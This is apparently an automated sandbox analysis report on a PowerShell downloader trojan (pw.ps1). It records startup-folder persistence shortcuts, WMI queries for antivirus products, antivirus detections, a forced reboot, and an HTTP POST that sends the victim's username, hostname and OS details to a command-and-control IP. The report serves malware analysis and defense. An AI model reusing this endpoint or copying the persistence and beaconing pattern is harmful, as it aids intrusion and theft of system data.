file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_AA.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_yvfneu4_.lnk

Executes one or more WMI queries (2 events)

wmi	SELECT * FROM AntiVirusProduct
wmi	select * from Win32_OperatingSystem

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Cynet	Malicious (score: 99)
VIPRE	Heur.BZC.PZQ.Boxter.231.CBECF13B
Sangfor	Trojan.Generic-Script.Save.6d8eeaf9
Arcabit	Heur.BZC.PZQ.Boxter.231.CBECF13B
ESET-NOD32	PowerShell/RiskWare.Agent.U
Avast	PwrSh:Downloader-BH [Trj]
ClamAV	Win.Trojan.PowerMacro-5942596-0
BitDefender	Heur.BZC.PZQ.Boxter.231.CBECF13B
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.231.CBECF13B
Emsisoft	Heur.BZC.PZQ.Boxter.231.CBECF13B (B)
F-Secure	Trojan.TR/PShell.Dldr.VPJ
FireEye	Heur.BZC.PZQ.Boxter.231.CBECF13B
Sophos	Troj/PSDl-VV
Google	Detected
Avira	TR/PShell.Dldr.VPJ
GData	Heur.BZC.PZQ.Boxter.231.CBECF13B
Varist	PSH/Agent.LF
MAX	malware (ai score=84)
AVG	PwrSh:Downloader-BH [Trj]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send July 24, 2024, 9:10 a.m.	buffer: POST /ldht/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 94.131.117.72 Content-Length: 88 Expect: 100-continue Connection: Keep-Alive socket: 1532 sent: 169	1	169	0
send July 24, 2024, 9:10 a.m.	buffer: AT= test22 TEST22-PC Microsoft Windows 7 Professional N Korean (Korea) 32-Bit CPU socket: 1532 sent: 88	1	88	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\shutdown.exe" /r /t 15

The process powershell.exe wrote an executable file to disk (2 events)

file	C:\_yvfneu4_\_yvfneu4_i7.exe
file	C:\Windows\System32\shutdown.exe

pw.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All